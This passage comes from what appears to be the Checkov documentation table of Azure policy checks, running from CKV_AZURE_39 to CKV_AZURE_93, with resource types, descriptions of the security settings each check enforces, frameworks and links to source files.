1670 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom 
subscription owner roles are created | Bicep | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | -| 1671 | CKV_AZURE_39 | resource | azurerm_role_definition | Ensure that no custom subscription owner roles are created | Terraform | [CutsomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CutsomRoleDefinitionSubscriptionOwner.py) | -| 1672 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | arm | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | -| 1673 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | Bicep | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | -| 1674 | CKV_AZURE_40 | resource | azurerm_key_vault_key | Ensure that the expiration date is set on all keys | Terraform | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyExpirationDate.py) | -| 1675 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | arm | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | -| 1676 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | Bicep | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | -| 1677 | CKV_AZURE_41 | resource | azurerm_key_vault_secret | Ensure that the expiration date is set on all secrets | Terraform | 
[SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretExpirationDate.py) | -| 1678 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | arm | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | -| 1679 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | Bicep | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | -| 1680 | CKV_AZURE_42 | resource | azurerm_key_vault | Ensure the key vault is recoverable | Terraform | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyvaultRecoveryEnabled.py) | -| 1681 | CKV_AZURE_43 | resource | azurerm_storage_account | Ensure Storage Accounts adhere to the naming rules | Terraform | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountName.py) | -| 1682 | CKV_AZURE_44 | resource | azurerm_storage_account | Ensure Storage Account is using the latest version of TLS encryption | Terraform | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountMinimumTlsVersion.py) | -| 1683 | CKV_AZURE_45 | resource | azurerm_virtual_machine | Ensure that no sensitive credentials are exposed in VM custom_data | Terraform | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py) | -| 1684 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | arm | 
[MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) | -| 1685 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Bicep | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) | -| 1686 | CKV_AZURE_47 | resource | azurerm_mariadb_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Terraform | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBSSLEnforcementEnabled.py) | -| 1687 | CKV_AZURE_48 | resource | azurerm_mariadb_server | Ensure 'public network access enabled' is set to 'False' for MariaDB servers | Terraform | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBPublicAccessDisabled.py) | -| 1688 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | arm | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) | -| 1689 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) | -| 1690 | CKV_AZURE_49 | resource | azurerm_linux_virtual_machine_scale_set | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureScaleSetPassword.py) | -| 
1691 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | arm | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) | -| 1692 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | Bicep | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) | -| 1693 | CKV_AZURE_50 | resource | azurerm_linux_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) | -| 1694 | CKV_AZURE_50 | resource | azurerm_windows_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) | -| 1695 | CKV_AZURE_52 | resource | azurerm_mssql_server | Ensure MSSQL is using the latest version of TLS encryption | Terraform | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerMinTLSVersion.py) | -| 1696 | CKV_AZURE_53 | resource | azurerm_mysql_server | Ensure 'public network access enabled' is set to 'False' for mySQL servers | Terraform | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLPublicAccessDisabled.py) | -| 1697 | CKV_AZURE_54 | resource | azurerm_mysql_server | Ensure MySQL is using the latest version of TLS encryption | Terraform | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerMinTLSVersion.py) | -| 1698 | CKV_AZURE_55 | 
resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Servers | Terraform | [AzureDefenderOnServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnServers.py) | -| 1699 | CKV_AZURE_56 | resource | azurerm_function_app | Ensure that function apps enables Authentication | Terraform | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsEnableAuthentication.py) | -| 1700 | CKV_AZURE_57 | resource | azurerm_app_service | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | -| 1701 | CKV_AZURE_57 | resource | azurerm_linux_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | -| 1702 | CKV_AZURE_57 | resource | azurerm_windows_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | -| 1703 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | arm | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | -| 1704 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | Bicep | 
[SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | -| 1705 | CKV_AZURE_58 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces enables managed virtual networks | Terraform | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | -| 1706 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | arm | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) | -| 1707 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | Bicep | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) | -| 1708 | CKV_AZURE_59 | resource | azurerm_storage_account | Ensure that Storage accounts disallow public access | Terraform | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py) | -| 1709 | CKV_AZURE_61 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for App Service | Terraform | [AzureDefenderOnAppServices.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnAppServices.py) | -| 1710 | CKV_AZURE_62 | resource | azurerm_function_app | Ensure function apps are not accessible from all regions | Terraform | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppDisallowCORS.py) | -| 1711 | 
CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | arm | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) | -| 1712 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | Bicep | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) | -| 1713 | CKV_AZURE_63 | resource | azurerm_app_service | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | -| 1714 | CKV_AZURE_63 | resource | azurerm_linux_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | -| 1715 | CKV_AZURE_63 | resource | azurerm_windows_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | -| 1716 | CKV_AZURE_64 | resource | azurerm_storage_sync | Ensure that Azure File Sync disables public network access | Terraform | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageSyncPublicAccessDisabled.py) | -| 1717 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | arm | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) | -| 1718 | CKV_AZURE_65 | resource | 
Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | Bicep | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) | -| 1719 | CKV_AZURE_65 | resource | azurerm_app_service | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | -| 1720 | CKV_AZURE_65 | resource | azurerm_linux_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | -| 1721 | CKV_AZURE_65 | resource | azurerm_windows_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | -| 1722 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | arm | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) | -| 1723 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | Bicep | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) | -| 1724 | CKV_AZURE_66 | resource | azurerm_app_service | Ensure that App service enables failed request tracing | Terraform | 
[AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | -| 1725 | CKV_AZURE_66 | resource | azurerm_linux_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | -| 1726 | CKV_AZURE_66 | resource | azurerm_windows_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | -| 1727 | CKV_AZURE_67 | resource | azurerm_function_app | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) | -| 1728 | CKV_AZURE_67 | resource | azurerm_function_app_slot | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) | -| 1729 | CKV_AZURE_68 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server disables public network access | Terraform | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerPublicAccessDisabled.py) | -| 1730 | CKV_AZURE_69 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Azure SQL database servers | Terraform | [AzureDefenderOnSqlServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServers.py) | -| 
1731 | CKV_AZURE_70 | resource | azurerm_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1732 | CKV_AZURE_70 | resource | azurerm_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1733 | CKV_AZURE_70 | resource | azurerm_linux_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1734 | CKV_AZURE_70 | resource | azurerm_linux_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1735 | CKV_AZURE_70 | resource | azurerm_windows_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1736 | CKV_AZURE_70 | resource | azurerm_windows_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1737 | CKV_AZURE_71 | resource | azurerm_app_service | Ensure that Managed identity provider is enabled for app services | Terraform | 
[AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | -| 1738 | CKV_AZURE_71 | resource | azurerm_linux_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | -| 1739 | CKV_AZURE_71 | resource | azurerm_windows_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | -| 1740 | CKV_AZURE_72 | resource | azurerm_app_service | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | -| 1741 | CKV_AZURE_72 | resource | azurerm_linux_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | -| 1742 | CKV_AZURE_72 | resource | azurerm_windows_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | -| 1743 | CKV_AZURE_73 | resource | azurerm_automation_variable_bool | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | -| 
1744 | CKV_AZURE_73 | resource | azurerm_automation_variable_datetime | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | -| 1745 | CKV_AZURE_73 | resource | azurerm_automation_variable_int | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | -| 1746 | CKV_AZURE_73 | resource | azurerm_automation_variable_string | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | -| 1747 | CKV_AZURE_74 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer (Kusto) uses disk encryption | Terraform | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerUsesDiskEncryption.py) | -| 1748 | CKV_AZURE_75 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer uses double encryption | Terraform | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDataExplorerDoubleEncryptionEnabled.py) | -| 1749 | CKV_AZURE_76 | resource | azurerm_batch_account | Ensure that Azure Batch account uses key vault to encrypt data | Terraform | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureBatchAccountUsesKeyVaultEncryption.py) | -| 1750 | CKV_AZURE_77 | resource | azurerm_network_security_group | Ensure that UDP Services are restricted from the Internet | Terraform | 
[NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) | -| 1751 | CKV_AZURE_77 | resource | azurerm_network_security_rule | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) | -| 1752 | CKV_AZURE_78 | resource | azurerm_app_service | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | -| 1753 | CKV_AZURE_78 | resource | azurerm_linux_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | -| 1754 | CKV_AZURE_78 | resource | azurerm_windows_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | -| 1755 | CKV_AZURE_79 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for SQL servers on machines | Terraform | [AzureDefenderOnSqlServerVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServerVMS.py) | -| 1756 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | arm | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) | -| 1757 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Bicep | 
[AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) | -| 1758 | CKV_AZURE_80 | resource | azurerm_app_service | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) | -| 1759 | CKV_AZURE_80 | resource | azurerm_windows_web_app | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) | -| 1760 | CKV_AZURE_81 | resource | azurerm_app_service | Ensure that 'PHP version' is the latest, if used to run the web app | Terraform | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePHPVersion.py) | -| 1761 | CKV_AZURE_82 | resource | azurerm_app_service | Ensure that 'Python version' is the latest, if used to run the web app | Terraform | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePythonVersion.py) | -| 1762 | CKV_AZURE_83 | resource | azurerm_app_service | Ensure that 'Java version' is the latest, if used to run the web app | Terraform | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceJavaVersion.py) | -| 1763 | CKV_AZURE_84 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Storage | Terraform | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnStorage.py) | -| 1764 | CKV_AZURE_85 | resource | 
azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Kubernetes | Terraform | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKubernetes.py) | -| 1765 | CKV_AZURE_86 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Container Registries | Terraform | [AzureDefenderOnContainerRegistry.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnContainerRegistry.py) | -| 1766 | CKV_AZURE_87 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Key Vault | Terraform | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKeyVaults.py) | -| 1767 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | arm | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) | -| 1768 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | Bicep | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) | -| 1769 | CKV_AZURE_88 | resource | azurerm_app_service | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | -| 1770 | CKV_AZURE_88 | resource | azurerm_linux_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | -| 1771 | CKV_AZURE_88 | resource | azurerm_windows_web_app | 
Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | -| 1772 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | arm | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) | -| 1773 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | Bicep | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) | -| 1774 | CKV_AZURE_89 | resource | azurerm_redis_cache | Ensure that Azure Cache for Redis disables public network access | Terraform | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCachePublicNetworkAccessEnabled.py) | -| 1775 | CKV_AZURE_91 | resource | azurerm_redis_cache | Ensure that only SSL are enabled for Cache for Redis | Terraform | [RedisCacheEnableNonSSLPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheEnableNonSSLPort.py) | -| 1776 | CKV_AZURE_92 | resource | azurerm_linux_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) | -| 1777 | CKV_AZURE_92 | resource | azurerm_windows_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) | -| 1778 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed 
